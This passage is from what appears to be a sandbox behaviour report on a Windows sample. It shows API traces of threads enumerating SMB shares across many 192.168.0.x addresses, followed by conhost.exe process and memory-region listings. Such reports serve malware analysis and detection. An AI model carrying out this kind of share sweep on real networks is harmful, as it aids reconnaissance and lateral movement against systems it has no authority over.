lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.172] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x70dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x70dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.175] NetShareEnum (in: servername="\\\\192.168.0.146", level=0x1, bufptr=0x70dfedc, prefmaxlen=0xffffffff, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc | out: bufptr=0x70dfedc, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc) returned 0x35 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.211", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.211", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.211", lpUsedDefaultChar=0x0) returned 15 [0211.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.167] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.167] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x70dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x70dfc54*=0x33, lpOverlapped=0x0) returned 1 [0211.256] NetShareEnum (in: servername="\\\\192.168.0.211", level=0x1, bufptr=0x70dfedc, prefmaxlen=0xffffffff, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc | out: bufptr=0x70dfedc, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc) returned 0x35 [0258.058] SetEvent (hEvent=0x1dc) returned 1 [0258.058] RtlExitUserThread (Status=0x0) Thread: id = 84 os_tid = 0xd0c [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.64", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.64", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.64", lpUsedDefaultChar=0x0) returned 14 [0089.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.950] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.950] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x721fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x721fc54*=0x10, lpOverlapped=0x0) returned 1 [0090.206] NetShareEnum (in: servername="\\\\192.168.0.64", level=0x1, bufptr=0x721fedc, prefmaxlen=0xffffffff, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc | out: bufptr=0x721fedc, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc) returned 0x35 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.127", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.127", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.127", lpUsedDefaultChar=0x0) returned 15 [0144.893] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.893] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.893] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.893] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x721fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x721fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.895] NetShareEnum (in: servername="\\\\192.168.0.127", level=0x1, bufptr=0x721fedc, prefmaxlen=0xffffffff, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc | out: bufptr=0x721fedc, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc) returned 0x35 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.143", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.143", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.143", lpUsedDefaultChar=0x0) returned 15 [0178.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.152] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x721fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x721fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.156] NetShareEnum (in: servername="\\\\192.168.0.143", level=0x1, bufptr=0x721fedc, prefmaxlen=0xffffffff, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc | out: bufptr=0x721fedc, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc) returned 0x35 [0211.210] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.246", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.210] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.246", cchWideChar=15, lpMultiByteStr=0x1e8326c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.246", lpUsedDefaultChar=0x0) returned 15 [0211.210] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x721fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x721fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.492] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.492] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x721ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.492] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.492] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.492] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x721fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x721fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.492] NetShareEnum (in: servername="\\\\192.168.0.246", level=0x1, bufptr=0x721fedc, prefmaxlen=0xffffffff, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc | out: bufptr=0x721fedc, entriesread=0x721fed4, totalentries=0x721fed0, resume_handle=0x721fecc) returned 0x35 [0257.991] SetEvent (hEvent=0x1dc) returned 1 [0257.991] RtlExitUserThread (Status=0x0) Thread: id = 89 os_tid = 0xee8 Thread: id = 90 os_tid = 0xeec Thread: id = 797 os_tid = 0xec Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2cd9e000" os_pid = "0x148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb68" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 451 start_va = 0x7f746000 end_va = 0x7f746fff entry_point = 0x0 region_type = private name = "private_0x000000007f746000" filename = "" Region: id = 452 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 453 start_va = 0xe836bb0000 end_va = 0xe836bcffff entry_point = 0x0 region_type = private name = "private_0x000000e836bb0000" filename = "" Region: id = 454 start_va = 0xe836bd0000 end_va = 0xe836be3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836bd0000" filename = "" Region: id = 455 start_va = 0xe836bf0000 end_va = 0xe836c2ffff entry_point = 0x0 region_type = private name = "private_0x000000e836bf0000" filename = "" Region: id = 456 start_va = 0x7df5ff720000 end_va = 0x7ff5ff71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff720000" filename = "" Region: id = 457 start_va = 0x7ff7fd450000 end_va = 0x7ff7fd472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd450000" filename = "" Region: id = 458 start_va = 0x7ff7fd47d000 end_va = 0x7ff7fd47efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd47d000" filename = "" Region: id = 459 start_va = 0x7ff7fd47f000 end_va = 0x7ff7fd47ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd47f000" filename = "" Region: id = 460 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 461 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 462 start_va = 0xe836bb0000 end_va = 0xe836bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836bb0000" filename = "" Region: id = 463 start_va = 0xe836cc0000 end_va = 0xe836dbffff entry_point = 0x0 region_type = private name = "private_0x000000e836cc0000" filename = "" Region: id = 464 start_va = 0x7ff7fd350000 end_va = 0x7ff7fd44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd350000" filename = "" Region: id = 465 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 466 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 467 start_va = 0xe836bc0000 end_va = 0xe836bc6fff entry_point = 0x0 region_type = private name = "private_0x000000e836bc0000" filename = "" Region: id = 468 start_va = 0xe836c30000 end_va = 0xe836c6ffff entry_point = 0x0 region_type = private name = "private_0x000000e836c30000" filename = "" Region: id = 469 start_va = 0xe836c70000 end_va = 0xe836c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836c70000" filename = "" Region: id = 470 start_va = 0xe836c80000 end_va = 0xe836c86fff entry_point = 0x0 region_type = private name = "private_0x000000e836c80000" filename = "" Region: id = 471 start_va = 0xe836c90000 end_va = 0xe836c90fff entry_point = 0x0 region_type = private name = "private_0x000000e836c90000" filename = "" Region: id = 472 start_va = 0xe836ca0000 end_va = 0xe836ca0fff entry_point = 0x0 region_type = private name = "private_0x000000e836ca0000" filename = "" Region: id = 473 start_va = 0xe836dc0000 end_va = 0xe836e7dfff entry_point = 0xe836dc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 474 start_va = 0xe836f20000 end_va = 0xe836f2ffff entry_point = 0x0 region_type = private name = "private_0x000000e836f20000" filename = "" Region: id = 475 start_va = 0xe836f30000 end_va = 0xe8370b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836f30000" filename = "" Region: id = 476 start_va = 0xe8370c0000 end_va = 0xe837240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8370c0000" filename = "" Region: id = 477 start_va = 0xe837250000 end_va = 0xe83864ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e837250000" filename = "" Region: id = 478 start_va = 0x7ff7fd47b000 end_va = 0x7ff7fd47cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd47b000" filename = "" Region: id = 479 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 480 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 481 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 482 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 483 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 484 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 485 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 486 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 487 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 488 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 489 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 490 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 491 start_va = 0xe836cb0000 end_va = 0xe836cb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836cb0000" filename = "" Region: id = 492 start_va = 0xe836ea0000 end_va = 0xe836eaffff entry_point = 0x0 region_type = private name = "private_0x000000e836ea0000" filename = "" Region: id = 493 start_va = 0xe836eb0000 end_va = 0xe836eeffff entry_point = 0x0 region_type = private name = "private_0x000000e836eb0000" filename = "" Region: id = 494 start_va = 0xe836f10000 end_va = 0xe836f1ffff entry_point = 0x0 region_type = private name = "private_0x000000e836f10000" filename = "" Region: id = 495 start_va = 0xe838650000 end_va = 0xe838986fff entry_point = 0xe838650000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 496 start_va = 0xe838990000 end_va = 0xe838bacfff entry_point = 0x0 region_type = private name = "private_0x000000e838990000" filename = "" Region: id = 497 start_va = 0xe838bb0000 end_va = 0xe838dc9fff entry_point = 0x0 region_type = private name = "private_0x000000e838bb0000" filename = "" Region: id = 498 start_va = 0xe838dd0000 end_va = 0xe838ee7fff entry_point = 0x0 region_type = private name = "private_0x000000e838dd0000" filename = "" Region: id = 499 start_va = 0xe838ef0000 end_va = 0xe83910afff entry_point = 0x0 region_type = private name = "private_0x000000e838ef0000" filename = "" Region: id = 500 start_va = 0xe839110000 end_va = 0xe839227fff entry_point = 0x0 region_type = private name = "private_0x000000e839110000" filename = "" Region: id = 501 start_va = 0xe839230000 end_va = 0xe8392e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e839230000" filename = "" Region: id = 502 start_va = 0x7ff7fd479000 end_va = 0x7ff7fd47afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd479000" filename = "" Region: id = 503 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 504 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 505 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 506 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 507 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 508 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 509 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 510 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 511 start_va = 0x7ffaf75d0000 end_va = 